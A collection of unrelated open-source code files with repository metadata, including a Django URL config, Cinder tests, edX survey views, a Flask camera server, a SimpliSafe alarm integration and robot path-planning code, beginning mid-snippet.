# Don't connect all neurons:
if np.random.rand() > r: continue
# Connections from the sensory neurons use the alpha function model;
# all other connections use the power_gpot_gpot model:
pre_id = neu_type[i]+"_"+str(src)
|
dextervip/rpv
|
GerenDisponibilidade/professor/urls.py
|
Python
|
gpl-3.0
| 1,015
| 0.009852
|
from django.conf.urls.defaults import patterns, url, include
urlpatterns = patterns('professor.views',
url(r'^$', 'home', name='home'),
url(r'^adicionar-compromisso$', 'adicionarCompromisso', name='adicionarCompromisso'),
url(r'^visualizar-compromisso/(?P<id>\d{1,10})$', 'visualizarCompromisso', name='visualizarCompromisso'),
url(r'^editar-compromisso/(?P<id>\d{1,10})$', 'editarCompromisso', name='editarCompromisso'),
url(r'^excluir-compromisso/(?P<id>\d{1,10})$', 'excluirCompromisso', name='excluirCompromisso'),
url(r'^get-compromissos$', 'getCompromissos', name='getCompromissos'),
url(r'^disponibilidadeAula$', 'disponibilidadeAula', name='disponibilidadeAula'),
url(r'^informarInteresseDisciplina$', 'informarInteresseDisciplina', name='informarInteresseDisciplina'),
url(r'^getInteressesDisciplina$', 'getInteressesDisciplina', name='getInteressesDisciplina'),
url(r'^getDisponibilidadeAula$', 'getDisponibilidadeAula', name='getDisponibilidadeAula'),
)
|
fbouliane/ddns-updater-aws
|
setup.py
|
Python
|
mit
| 1,053
| 0
|
from distutils.core import setup
from setuptools import find_packages
setup(name='ddns_updater_aws',
version='0.1',
author='Felix Bouliane',
license='MIT',
py_modules=[],
packages=find_packages(exclude=['contrib', 'docs', 'test']),
url='https://github.com/fbouliane/ddns-updater-aws',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Topic :: Internet',
'Topic :: Internet :: Name Service (DNS)'
],
keywords='DNS, Dynamic DNS, fixed ip, route53, AWS, Amazon Web Services',
install_requires=[
'dnspython>=1.12.0,<2.0',
'ipaddress>=1.0.16,<2.0',
'route53>=1.0,<2.0',
'configparser>=3.3,<4.0'
],
entry_points={
'console_scripts': [
'ddns-updater-aws = ddns_updater_aws.__main__:main',
]
}
)
|
rickerc/cinder_audit
|
cinder/tests/db/test_name_id.py
|
Python
|
apache-2.0
| 2,344
| 0
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for volume name_id."""
from oslo.config import cfg
from cinder import context
from cinder import db
from cinder import test
from cinder.tests import utils as testutils
CONF = cfg.CONF
class NameIDsTestCase(test.TestCase):
"""Test cases for naming volumes with name_id."""
def setUp(self):
super(NameIDsTestCase, self).setUp()
self.ctxt = context.RequestContext(user_id='user_id',
project_id='project_id')
def tearDown(self):
super(NameIDsTestCase, self).tearDown()
def test_name_id_same(self):
"""New volume should have same 'id' and 'name_id'."""
vol_ref = testutils.create_volume(self.ctxt, size=1)
self.assertEqual(vol_ref['name_id'], vol_ref['id'])
expected_name = CONF.volume_name_template % vol_ref['id']
self.assertEqual(vol_ref['name'], expected_name)
def test_name_id_diff(self):
"""Change name ID to mimic volume after migration."""
vol_ref = testutils.create_volume(self.ctxt, size=1)
db.volume_update(self.ctxt, vol_ref['id'], {'name_id': 'fake'})
vol_ref = db.volume_get(self.ctxt, vol_ref['id'])
expected_name = CONF.volume_name_template % 'fake'
self.assertEqual(vol_ref['name'], expected_name)
def test_name_id_snapshot_volume_name(self):
"""Make sure snapshot['volume_name'] is updated."""
vol_ref = testutils.create_volume(self.ctxt, size=1)
db.volume_update(self.ctxt, vol_ref['id'], {'name_id': 'fake'})
snap_ref = testutils.create_snapshot(self.ctxt, vol_ref['id'])
expected_name = CONF.volume_name_template % 'fake'
self.assertEqual(snap_ref['volume_name'], expected_name)
|
xingyepei/edx-platform
|
lms/djangoapps/survey/views.py
|
Python
|
agpl-3.0
| 4,127
| 0.002908
|
"""
View endpoints for Survey
"""
import logging
import json
from django.contrib.auth.decorators import login_required
from django.http import (
HttpResponse, HttpResponseRedirect, HttpResponseNotFound
)
from django.core.urlresolvers import reverse
from django.views.decorators.http import require_POST
from django.conf import settings
from django.utils.html import escape
from opaque_keys.edx.keys import CourseKey
from edxmako.shortcuts import render_to_response
from survey.models import SurveyForm
from microsite_configuration import microsite
log = logging.getLogger("edx.survey")
@login_required
def view_survey(request, survey_name):
"""
View to render the survey to the end user
"""
redirect_url = request.GET.get('redirect_url')
return view_student_survey(request.user, survey_name, redirect_url=redirect_url)
def view_student_survey(user, survey_name, course=None, redirect_url=None, is_required=False, skip_redirect_url=None):
"""
Shared utility method to render a survey form
NOTE: This method is shared between the Survey and Courseware Djangoapps
"""
redirect_url = redirect_url if redirect_url else reverse('dashboard')
dashboard_redirect_url = reverse('dashboard')
skip_redirect_url = skip_redirect_url if skip_redirect_url else dashboard_redirect_url
survey = SurveyForm.get(survey_name, throw_if_not_found=False)
if not survey:
return HttpResponseRedirect(redirect_url)
# the result set from get_answers, has an outer key with the user_id
# just remove that outer key to make the JSON payload simplier
existing_answers = survey.get_answers(user=user).get(user.id, {})
platform_name = microsite.get_value('platform_name', settings.PLATFORM_NAME)
context = {
'existing_data_json': json.dumps(existing_answers),
'postback_url': reverse('submit_answers', args=[survey_name]),
'redirect_url': redirect_url,
'skip_redirect_url': skip_redirect_url,
'dashboard_redirect_url': dashboard_redirect_url,
'survey_form': survey.form,
'is_required': is_required,
'mail_to_link': microsite.get_value('email_from_address', settings.CONTACT_EMAIL),
'platform_name': platform_name,
'course': course,
}
return render_to_response("survey/survey.html", context)
@require_POST
@login_required
def submit_answers(request, survey_name):
"""
Form submission post-back endpoint.
NOTE: We do not have a formal definition of a Survey Form, it's just some authored HTML
form fields (via Django Admin site). Therefore we do not do any validation of the submission server side. It is
assumed that all validation is done via JavaScript in the survey.html file
"""
survey = SurveyForm.get(survey_name, throw_if_not_found=False)
if not survey:
return HttpResponseNotFound()
answers = {}
for key in request.POST.keys():
# support multi-SELECT form values, by string concatenating them with a comma separator
array_val = request.POST.getlist(key)
answers[key] = request.POST[key] if len(array_val) == 0 else ','.join(array_val)
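# e.g. a multi-SELECT submitting ['a', 'b'] is stored as the string "a,b"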
# the URL we are supposed to redirect to is
# in a hidden form field
redirect_url = answers['_redirect_url'] if '_redirect_url' in answers else reverse('dashboard')
course_key = CourseKey.from_string(answers['course_id']) if 'course_id' in answers else None
    allowed_field_names = survey.get_field_names()
# scrub the answers to make sure nothing malicious from the user gets stored in
# our database, e.g. JavaScript
filtered_answers = {}
for answer_key in answers.keys():
# only allow known input fields
if answer_key in allowed_field_names:
filtered_answers[answer_key] = escape(answers[answer_key])
survey.save_user_answers(request.user, filtered_answers, course_key)
response_params = json.dumps({
        # the URL the client should redirect to after a successful submission
"redirect_url": redirect_url,
})
return HttpResponse(response_params, content_type="text/json")
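# Illustration (not part of the view above): a minimal, dependency-light sketch
# of the multi-SELECT join plus HTML escaping performed in submit_answers.
# `filter_submission` and its inputs are hypothetical; html.escape stands in
# for django.utils.html.escape.
def filter_submission(post_lists, allowed_field_names):
    from html import escape
    filtered = {}
    for key, values in post_lists.items():
        if key not in allowed_field_names:
            continue  # unknown fields are dropped entirely
        # multi-SELECT values are string-concatenated with a comma separator
        filtered[key] = escape(values[0] if len(values) == 1 else ','.join(values))
    return filtered
# filter_submission({'color': ['red', 'blue'], 'evil': ['<script>']}, {'color'})
# -> {'color': 'red,blue'}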
|
agmscode/agms_python
|
agms/util/requests_client.py
|
Python
|
mit
| 509
| 0.001965
|
from __future__ import absolute_import
from agms.exception.not_found_exception import NotFoundException
try:
import requests
except ImportError as e:
raise NotFoundException(e)
class RequestsClient(object):
def http_do(self, http_verb, url, headers, request_body):
response = requests.request(
http_verb,
url,
            headers=headers,
data=request_body,
verify=True
)
        return [response.status_code, response.text]
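# Hypothetical usage sketch of the client above (the URL and headers are made
# up; http_do returns a [status_code, body] pair):
if __name__ == '__main__':
    client = RequestsClient()
    status, body = client.http_do('GET', 'https://example.com/api/ping',
                                  headers={'Accept': 'application/json'},
                                  request_body=None)
    print(status)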
|
langara/MyBlocks
|
picon.py
|
Python
|
apache-2.0
| 3,366
| 0.007427
|
#!/usr/bin/env python
"""Small tool for copying android icons from material-design-icons repo to specified android gradle module.
It copies all density versions of png files to appropriate res subdirectories.
Usage:
picon.py add <category> <name> [-i <path>] [-o <path>] [-c <color>] [-s <size>]
picon.py rem <name> [-o <path>] [-c <color>] [-s <size>]
picon.py (-h | --help)
picon.py (-v | --version)
Options:
-c, --color <color> Which color version to use (black or white or all) [default: all]
-s, --size <size> Which size to use (number in dp units or 'all') [default: all]
-i, --input <path> Path where local copy of material-design-icons repo is located [default: /media/data/android_big/material-design-icons]
-o, --output <path> Path of top android module directory where icons will be copied [default: /home/marek/code/android/MyBlocks/myres]
-h, --help Show help screen.
-v, --version Show version.
Commands:
add: copy new icon from material-design-icons repo to android module
rem: remove all versions of given icon from android module
"""
VERSION='0.1.0'
try:
from docopt import docopt
except ImportError:
print 'This script needs a "docopt" module (http://docopt.org)'
raise
from shutil import copyfile
from os import remove
from os import mkdir
from os.path import join
from os.path import isdir
densities = [
"mdpi",
"hdpi",
"xhdpi",
"xxhdpi",
"xxxhdpi",
]
def add(category, name, color, size, inp, outp):
if color == "all":
add(category, name, "black", size, inp, outp)
add(category, name, "white", size, inp, outp)
return
if size == "all":
add(category, name, color, "18", inp, outp)
add(category, name, color, "24", inp, outp)
add(category, name, color, "36", inp, outp)
add(category, name, color, "48", inp, outp)
return
name = name + "_" + color + "_" + size + "dp.png"
for density in densities:
idir = join(inp, category, "drawable-" + density)
        odir = join(outp, "src", "main", "res", "drawable-" + density)
if not isdir(odir):
mkdir(odir)
copyfile(join(idir, name), join(odir, name))
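# Illustration of the fan-out add() performs for color="all" and size="all":
# 2 colors x 4 sizes x 5 densities = 40 copies per icon. Nothing is copied
# here; this hypothetical helper only prints the planned file names.
def _print_copy_plan(category, name):
    for color in ("black", "white"):
        for size in ("18", "24", "36", "48"):
            fname = name + "_" + color + "_" + size + "dp.png"
            for density in densities:
                print(join(category, "drawable-" + density, fname))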
def rem(name, color, size, outp):
if color == "all":
rem(name, "black", size, outp)
rem(name, "white", size, outp)
return
if size == "all":
        rem(name, color, "18", outp)
rem(name, color, "24", outp)
rem(name, color, "36", outp)
rem(name, color, "48", outp)
return
name = name + "_" + color + "_" + size + "dp.png"
for density in densities:
ofile = join(outp, "src", "main", "res", "drawable-" + density, name)
try:
remove(ofile)
except OSError:
print "Can not remove:", ofile
def main():
argdict = docopt(__doc__, version=VERSION)
if argdict["add"]:
add(argdict["<category>"], argdict["<name>"], argdict["--color"], argdict["--size"], argdict["--input"], argdict["--output"])
elif argdict["rem"]:
rem(argdict["<name>"], argdict["--color"], argdict["--size"], argdict["--output"])
if __name__ == '__main__':
main()
|
awickert/river-network-evolution
|
backup/run_ThreeChannels_generalizing.py
|
Python
|
gpl-3.0
| 3,834
| 0.021127
|
import numpy as np
from scipy.sparse import spdiags, block_diag
from scipy.sparse.linalg import spsolve, isolve
from matplotlib import pyplot as plt
import copy
import time
import ThreeChannels_generalizing
reload(ThreeChannels_generalizing)
r = ThreeChannels_generalizing.rnet()
self = r
plt.ion()
# PER RIVER #
#############
self.eta = []
self.nx = 1E2 + 1
#######################
### INPUT VARIABLES ###
#######################
# GLOBAL UNIFORM #
##################
self.D = 200E-3 # [m] [uniform so far]
porosity = lambda_p = 0.35 # [-]
n_time_steps = 10
self.flow_from_to = np.array([[0,2],[1,2]])
self.flow_from = [[], [], [0,1]]
self.flow_to = [[2], [2], []]
self.b = [20, 20, 40]
self.segment_Q_in = self.headwaters_segments = np.array([[0,40],[1,20]])
self.nsegments = len(self.flow_from)
#self.flow_from_to = np.array([[0,1]])
#self.flow_from = [[], [0]]
#self.flow_to = [[1], []]
self.flow_from_to = np.array([[0,2],[1,2],[2,4],[3,4]])
self.flow_from = [[], [], [0,1], [], [2,3]]
self.flow_to = [[2], [2], [4], [4], []]
self.b = [20, 20, 40, 20, 60]
#self.b = [20, 30, 50, 10, 60]
self.segment_Q_in = self.headwaters_segments = np.array([[0,40],[1,20],[3,50]])
"""
self.flow_from_to = np.array([[0,1]])
self.flow_from = [[], [0]]
self.flow_to = [[1], []]
#self.b = [20, 20, 40, 20, 60]
self.b = [20, 20]
"""
# 3 rivers -- would often pull them in from GIS
# Keep everything uniform for starters
xmax = 1E3
self.B = 100 * np.ones(self.nx)
S = 1E-2
self.dt = 3.15E0
self.x = []
self.dx = []
self.h = []
self.eta = []
# Multiple rivers
for Si in range(len(self.flow_to)):
self.x.append(np.linspace(0, xmax, self.nx))
self.dx.append(np.mean(np.diff(self.x[-1]))) # Special case of uniform grid spacing
self.h.append(2. * np.ones(self.nx)) # specific case of 2 m depth everywhere
#self.x[-1] += self.x[-2][-1] + self.dx[-1] #Very specific to this 3-river set here
self.x[-3] += self.x[1][-1] + self.dx[-1] #Very specific to this 5-river set here
self.x[-2] += self.x[1][-1] + self.dx[-1] #Very specific to this 5-river set here
self.x[-1] += self.x[2][-1] + self.dx[-1] #Very specific to this 5-river set here
#self.x[-1] += self.x[-2][-1] + self.dx[-1] #Very specific to this 2-river set here
for row in self.x:
self.eta.append( -S * row + np.max(self.x)*S )
self.eta[-1] = np.round(self.eta[-1], 6) # coarse trick to rmv floating point issues
self.eta0 = copy.deepcopy(self.eta)
#########################
### DERIVED VARIABLES ###
#########################
self.nts = np.linspace(0, n_time_steps, n_time_steps+1) # start at 1 below, t0 is initial
self.A0 = []
for Si in range(len(self.x)):
self.A0.append( 11.325 / (1 - lambda_p) * self.h[Si]/self.D )
#q_s_in = 0.69623693 # [m^3 s^{-1}]
# q_s for equilibrium in each channel; used for transport slope upstream
# boundary conditions
#q_s_out = whatever it has to be to transport out as much material as it receives
q_s_equilibrium = np.array(self.sediment__discharge_per_unit_width())
#print np.mean(eta)
# Ignoring for now -- for iterating
# Assuming in order: so flow_from is really irrelevant; flow_to is the important part
"""
fig = plt.figure()
plt.ylim((0,50))
ax = plt.subplot(111)
"""
#for row in self.eta:
# row += 10
for ts in range(10):#self.nts:
# 3 iterations is usually good; nothing special about it, though.
self.eta_iter = copy.deepcopy(self.eta) # For iteration
self.stack_vars()
for iter_i in range(20):
self.build_coeff_matrix(q_s_equilibrium)
self.build_RHS()
#print np.max(np.hstack(self.eta_iter))
self.solve()
self.update()
"""
ax.clear()
if ts % 25 == 0:
self.riverplot(linewidth=2)
#plt.ylim((0,40))
#plt.draw()
plt.pause(0.0001)
"""
self.stack_vars()
#self.plot_coeff_matrix()
#plt.ylim((0,40))
self.riverplot(linewidth=4, plot_start=True)
plt.show()
|
redhat-performance/tuned
|
tuned/profiles/functions/function_cpulist_present.py
|
Python
|
gpl-2.0
| 691
| 0.023155
|
import os
import tuned.logs
from . import base
from tuned.utils.commands import commands
log = tuned.logs.get()
class cpulist_present(base.Function):
"""
Checks whether CPUs from list are present, returns list containing
only present CPUs
"""
def __init__(self):
# arbitrary number of arguments
super(cpulist_present, self).__init__("cpulist_present", 0)
def execute(self, args):
        if not super(cpulist_present, self).execute(args):
return None
        cpus = self._cmd.cpulist_unpack(",,".join(args))
present = self._cmd.cpulist_unpack(self._cmd.read_file("/sys/devices/system/cpu/present"))
return ",".join(str(v) for v in sorted(list(set(cpus).intersection(set(present)))))
|
inventree/InvenTree
|
InvenTree/plugin/plugin.py
|
Python
|
mit
| 2,145
| 0.000932
|
# -*- coding: utf-8 -*-
"""
Base Class for InvenTree plugins
"""
import warnings
from django.db.utils import OperationalError, ProgrammingError
from django.utils.text import slugify
class InvenTreePluginBase():
"""
Base class for a plugin
DO NOT USE THIS DIRECTLY, USE plugin.IntegrationPluginBase
"""
def __init__(self):
pass
# Override the plugin name for each concrete plugin instance
PLUGIN_NAME = ''
PLUGIN_SLUG = None
PLUGIN_TITLE = None
def plugin_name(self):
"""
Name of plugin
"""
return self.PLUGIN_NAME
def plugin_slug(self):
"""
Slug of plugin
        If not set, the slugified plugin name is used
"""
slug = getattr(self, 'PLUGIN_SLUG', None)
if slug is None:
slug = self.plugin_name()
return slugify(slug.lower())
def plugin_title(self):
"""
Title of plugin
"""
if self.PLUGIN_TITLE:
return self.PLUGIN_TITLE
else:
return self.plugin_name()
def plugin_config(self, raise_error=False):
"""
Return the PluginConfig object associated with this plugin
"""
try:
import plugin.models
cfg, _ = plugin.models.PluginConfig.objects.get_or_create(
key=self.plugin_slug(),
name=self.plugin_name(),
)
except (OperationalError, ProgrammingError) as error:
cfg = None
if raise_error:
raise error
return cfg
def is_active(self):
"""
Return True if this plugin is currently active
"""
        cfg = self.plugin_config()
if cfg:
return cfg.active
else:
return False
# TODO @matmair remove after InvenTree 0.7.0 release
class InvenTreePlugin(InvenTreePluginBase):
"""
    This is here for legacy reasons and will be removed in the next major release
"""
def __init__(self):
warnings.warn("Using the InvenTreePlugin is depreceated", DeprecationWarning)
super().__init__()
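# Hypothetical concrete plugin, sketching the fallbacks above (needs Django
# installed for slugify; PLUGIN_SLUG and PLUGIN_TITLE are left unset on purpose):
class DemoPlugin(InvenTreePluginBase):
    PLUGIN_NAME = 'Demo Plugin'
# DemoPlugin().plugin_slug()  -> 'demo-plugin'  (slugified from PLUGIN_NAME)
# DemoPlugin().plugin_title() -> 'Demo Plugin'  (falls back to plugin_name())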
|
jackfirth/pyramda
|
pyramda/math/product.py
|
Python
|
mit
| 147
| 0
|
from pyramda.function.curry import curry
from pyramda.iterable.reduce import reduce
from .multiply import multiply
product = reduce(multiply, 1)
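# Usage sketch: pyramda's reduce is curried, so reduce(multiply, 1) returns a
# function that still awaits its iterable; the initial value 1 also makes the
# empty product well defined.
if __name__ == '__main__':
    assert product([2, 3, 4]) == 24
    assert product([]) == 1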
|
3299/visioninabox
|
server.py
|
Python
|
mit
| 2,744
| 0.027697
|
#!/usr/bin/env python
import json, os, time
from flask import Flask, request, render_template, Response
from gevent import pywsgi, monkey
from helpers.generateCalibration import GenerateCalibration
#monkey.patch_all()
app = Flask(__name__)
#cameraInstance = Camera()
runCalibration = GenerateCalibration('frames', 'calibration.json')
class VisionServer:
def __init__(self, queue):
self.inQueue = queue
@app.route('/')
def index():
return render_template('index.html')
@app.route('/hsl')
def hslPage():
return render_template('hsl.html')
@app.route('/calibrate')
def calibratePage():
return render_template('calibrate.html')
def genStream(camera):
while True:
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + camera.get_frame() + b'\r\n')
time.sleep(0.005) # yes, this delay is intentional.
# maybe it's a hack, but hey, it works.
@app.route('/stream')
def stream():
return Response(genStream(cameraInstance), mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/post', methods=['POST'])
def post():
if (request.form['action'] == 'changeHSL'):
        cameraInstance.changeHSL({'component': request.form['component'], 'min': request.form['min'], 'max': request.form['max']})
elif (request.form['action'] == 'getHSL'):
return json.dumps(cameraInstance.getHSL())
    elif (request.form['action'] == 'saveHSL'):
return str(cameraInstance.saveHSL())
elif (request.form['action'] == 'setExposure'):
return str(cameraInstance.setExposure(int(request.form['exposure'])))
elif (request.form['action'] == 'on' or request.form['action'] == 'off'):
if (request.form['action'] == 'on'):
visionController.start()
else:
visionController.stop()
        return str(True)
return str(True)
@app.route('/capture')
def capture():
# makes directory if it doesn't exist
if not os.path.exists('frames'):
os.makedirs('frames')
# finds the highest int in filenames
maxN = 0
if (os.listdir('frames')):
files = os.listdir('frames')
for file in files:
this = file.split('.')[0]
if (this != ''):
if (int(this) > maxN):
maxN = int(this)
return str(cameraInstance.saveFrame('frames/' + str(maxN + 1) + '.jpg'))
@app.route('/calibrate')
def calibrate():
return str(runCalibration.run())
if __name__ == '__main__':
gevent_server = pywsgi.WSGIServer(('', 80), app)
gevent_server.serve_forever()
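# Standalone sketch (hypothetical helper, not wired into the routes above): the
# /capture numbering reduces to scanning existing "<n>.jpg" names for the
# largest integer and adding one.
def _next_frame_number(filenames):
    max_n = 0
    for fn in filenames:
        stem = fn.split('.')[0]
        if stem.isdigit():
            max_n = max(max_n, int(stem))
    return max_n + 1
# _next_frame_number(['1.jpg', '7.jpg', 'notes.txt']) -> 8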
|
qedi-r/home-assistant
|
homeassistant/components/simplisafe/alarm_control_panel.py
|
Python
|
apache-2.0
| 5,527
| 0.000543
|
"""Support for SimpliSafe alarm control panels."""
import logging
import re
from simplipy.entity import EntityTypes
from simplipy.system import SystemStates
from homeassistant.components.alarm_control_panel import (
FORMAT_NUMBER,
FORMAT_TEXT,
AlarmControlPanel,
)
from homeassistant.components.alarm_control_panel.const import (
SUPPORT_ALARM_ARM_AWAY,
SUPPORT_ALARM_ARM_HOME,
)
from homeassistant.const import (
CONF_CODE,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_DISARMED,
)
from homeassistant.util.dt import utc_from_timestamp
from . import SimpliSafeEntity
from .const import DATA_CLIENT, DOMAIN
_LOGGER = logging.getLogger(__name__)
ATTR_ALARM_ACTIVE = "alarm_active"
ATTR_BATTERY_BACKUP_POWER_LEVEL = "battery_backup_power_level"
ATTR_GSM_STRENGTH = "gsm_strength"
ATTR_LAST_EVENT_INFO = "last_event_info"
ATTR_LAST_EVENT_SENSOR_NAME = "last_event_sensor_name"
ATTR_LAST_EVENT_SENSOR_TYPE = "last_event_sensor_type"
ATTR_LAST_EVENT_TIMESTAMP = "last_event_timestamp"
ATTR_LAST_EVENT_TYPE = "last_event_type"
ATTR_RF_JAMMING = "rf_jamming"
ATTR_WALL_POWER_LEVEL = "wall_power_level"
ATTR_WIFI_STRENGTH = "wifi_strength"
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up a SimpliSafe alarm control panel based on existing config."""
pass
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up a SimpliSafe alarm control panel based on a config entry."""
simplisafe = hass.data[DOMAIN][DATA_CLIENT][entry.entry_id]
async_add_entities(
[
SimpliSafeAlarm(simplisafe, system, entry.data.get(CONF_CODE))
for system in simplisafe.systems.values()
],
True,
)
class SimpliSafeAlarm(SimpliSafeEntity, AlarmControlPanel):
"""Representation of a SimpliSafe alarm."""
def __init__(self, simplisafe, system, code):
"""Initialize the SimpliSafe alarm."""
super().__init__(system, "Alarm Control Panel")
self._changed_by = None
self._code = code
self._simplisafe = simplisafe
self._state = None
# Some properties only exist for V2 or V3 systems:
for prop in (
ATTR_BATTERY_BACKUP_POWER_LEVEL,
ATTR_GSM_STRENGTH,
ATTR_RF_JAMMING,
ATTR_WALL_POWER_LEVEL,
ATTR_WIFI_STRENGTH,
):
if hasattr(system, prop):
self._attrs[prop] = getattr(system, prop)
@property
def changed_by(self):
"""Return info about who changed the alarm last."""
return self._changed_by
@property
def code_format(self):
"""Return one or more digits/characters."""
if not self._code:
return None
if isinstance(self._code, str) and re.search("^\\d+$", self._code):
return FORMAT_NUMBER
return FORMAT_TEXT
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
return SUPPORT_ALARM_ARM_HOME | SUPPORT_ALARM_ARM_AWAY
def _validate_code(self, code, state):
"""Validate given code."""
check = self._code is None or code == self._code
if not check:
_LOGGER.warning("Wrong code entered for %s", state)
return check
async def async_alarm_disarm(self, code=None):
"""Send disarm command."""
if not self._validate_code(code, "disarming"):
return
await self._system.set_off()
async def async_alarm_arm_home(self, code=None):
"""Send arm home command."""
if not self._validate_code(code, "arming home"):
return
await self._system.set_home()
async def async_alarm_arm_away(self, code=None):
"""Send arm away command."""
if not self._validate_code(code, "arming away"):
return
await self._system.set_away()
async def async_update(self):
"""Update alarm status."""
        event_data = self._simplisafe.last_event_data[self._system.system_id]
if event_data.get("pinName"):
self._changed_by = event_data["pinName"]
if self._system.state == SystemStates.error:
self._online = False
return
self._online = True
if self._system.state == SystemStates.off:
            self._state = STATE_ALARM_DISARMED
elif self._system.state in (SystemStates.home, SystemStates.home_count):
self._state = STATE_ALARM_ARMED_HOME
elif self._system.state in (
SystemStates.away,
SystemStates.away_count,
SystemStates.exit_delay,
):
self._state = STATE_ALARM_ARMED_AWAY
else:
self._state = None
last_event = self._simplisafe.last_event_data[self._system.system_id]
self._attrs.update(
{
ATTR_ALARM_ACTIVE: self._system.alarm_going_off,
ATTR_LAST_EVENT_INFO: last_event["info"],
ATTR_LAST_EVENT_SENSOR_NAME: last_event["sensorName"],
ATTR_LAST_EVENT_SENSOR_TYPE: EntityTypes(last_event["sensorType"]).name,
ATTR_LAST_EVENT_TIMESTAMP: utc_from_timestamp(
last_event["eventTimestamp"]
),
ATTR_LAST_EVENT_TYPE: last_event["eventType"],
}
)
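# Standalone sketch of the code_format decision above (hypothetical helper;
# mirrors the all-digits regex test that selects FORMAT_NUMBER over FORMAT_TEXT):
def _code_format_sketch(code):
    if not code:
        return None
    return "number" if re.search(r"^\d+$", code) else "text"
# _code_format_sketch("1234") -> "number"; _code_format_sketch("ab12") -> "text"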
|
TheCamusean/DLRCev3
|
scripts/benchmarks/demo3.py
|
Python
|
mit
| 27,312
| 0.028412
|
#Euclidean path planning control with Kalman filter for localization
import time
import cv2
from ev3control.rpc import Robot
from rick.controllers import *
from rick.A_star_planning import *
from rick.core import State
from rick.core import main_loop
from rick.async import AsyncCamera
from rick.utils import TrackerWrapper, bbox_center
from nn_object_detection.object_detectors import NNObjectDetector
from rick.live_plotting import MapRenderer
from detection.marker_localization import get_marker_pose, load_camera_params
import cv2.aruco as aruco
from dlrc_one_shot_learning.similarity_detectors import EuclidianNNFeaturesBrickFinder, VAESimilarityDetector
from rick.mc_please_github_donot_fuck_with_this_ones import A_star_path_planning_control,compute_A_star_path, A_star_control
import numpy as np
from math import pi
from sklearn.mixture import GaussianMixture
from detection.opencv import get_lego_boxes as gl, eliminate_grip  # gl: raw detector, re-wrapped below
# from clustering import BBoxKMeansClustering
from rick.motion_control import euclidian_kalman , kalman_filter , kalman_filter2 , robot_control, odom_estimation
import sys
sys.path.append("../slam/")
import mapping
import matplotlib.pyplot as plt
from detection.opencv import detect_purple
PATH_TO_CKPT = "/home/julen/dlrc_models/frozen_inference_graph.pb"
PATH_TO_LABELS = "/home/dlrc/projects/DLRCev3/object_detection/nn_object_detection/tf_train_dir/data/label_map.pbtxt"
print("Creating robot...")
data = np.load('Homographygood.npz')
H=data["arr_0"]
map_renderer = MapRenderer()
object_detector = NNObjectDetector(PATH_TO_CKPT, PATH_TO_LABELS)
similarity_detector = VAESimilarityDetector()
clustering_alg = GaussianMixture(n_components=4)
NUM_CLUSTERS = 2
def acquire_target(robot, frame, **kwargs):
"""Callback for acquiring a lego target."""
BB_legos = get_lego_boxes(frame)
# We wait until there's only one lego in view
if len(BB_legos) == 1:
print("found a brick")
bboxes = [frame[bbox[0]:bbox[2], bbox[1]:bbox[3]] for bbox in BB_legos]
robot.target = bounding_box_features = similarity_detector.extract_features(bboxes)[0]
return "SEARCH_TARGET", frame, {}
else:
print(len(BB_legos))
return "ACQUIRE_TARGET", frame, {}
def plot_mapa(mapa,robot_traj):
mapa1 = np.array(mapa)
rob = np.array(robot_traj)
print("Before stop")
if mapa1.size:
print("In")
plt.scatter(mapa1[:,0],mapa1[:,1])
print("Out")
if rob.size > 100:
plt.plot(rob[:,0],rob[:,1])
plt.axis([-100, 150, -100, 150])
plt.legend(["Lego", "path"])
plt.show()
print("After stop")
def search_control(state_search,mapa, pos_rob, t_old):
t1 = 0
if state_search ==1:
target = [0.1,0.1]# THE POINT REPRESENTS THE MIDDLE OF THE WORKSPACE
vel_wheels = robot_control(pos_rob,target, K_x=1,K_y=1,K_an=1)
distance = np.sqrt(np.power(pos_rob[0]-target[0],2) + np.power(pos_rob[1]-target[1],2))
if distance < 10:
state_search = 2
t1 = time.time()
elif state_search ==2:
vel_wheels = [100,100]
return vel_wheels,state_search,t1
def naive_obstacle_avoidance_control(mapa, pos_rob):
max_dist = 30
min_angle = -pi/5
max_angle = pi/5
mapa_ar = np.array(mapa)
vel_wheels = [160,150]
for i in range(0, len(mapa)):
er_x = mapa[i][0] - pos_rob[0]
er_y = mapa[i][1] - pos_rob[1]
distance = np.sqrt(np.power(er_x,2) + np.power(er_y,2))
er_angle = np.arctan2(er_y, er_x) - pos_rob[2]*pi/180
if er_angle >pi:
er_angle = er_angle -2*pi
if er_angle < -pi:
er_angle = er_angle +2*pi
next_x = pos_rob[0] + 10*np.cos(pos_rob[2] * pi/180)
next_y = pos_rob[1] + 10*np.sin(pos_rob[2] * pi/180)
if (distance< max_dist and er_angle > min_angle and er_angle< max_angle): # AVOID OBSTACLES
vel_wheels = [-100,100]
break
elif next_x < 0 or next_x > 300 or next_y < 0 or next_y> 300:
vel_wheels = [-100,100]
return vel_wheels
def get_lego_boxes(frame, threshold=0.9, return_closest=False):
#res = object_detector.detect_with_threshold(frame,threshold=threshold, return_closest=return_closest)
#BB_legos = map(lambda x: x[0], res)
#return list(BB_legos)
BB_legos=gl(frame)
return BB_legos
def index23(BB_legos,BB_target):
index=1000
i=0
for box in BB_legos:
if box[0]==BB_target[0][0] and box[1] == BB_target[0][1]:
index = i
i+=1
return index
def search_target_with_Kalman_and_mapping(robot, frame
, ltrack_pos=0, rtrack_pos=0, P=np.identity(3), marker_list = [], delete_countdown = 0 , mapa = [], robot_trajectory = [],R=[],state_search = 2 , t1=0,
t = None,feature_map = [],iteration=0,iteration2=0):
if not t:
t = time.time()
################ THIS IS ALLL
new_ltrack_pos = robot.left_track.position
new_rtrack_pos = robot.right_track.position
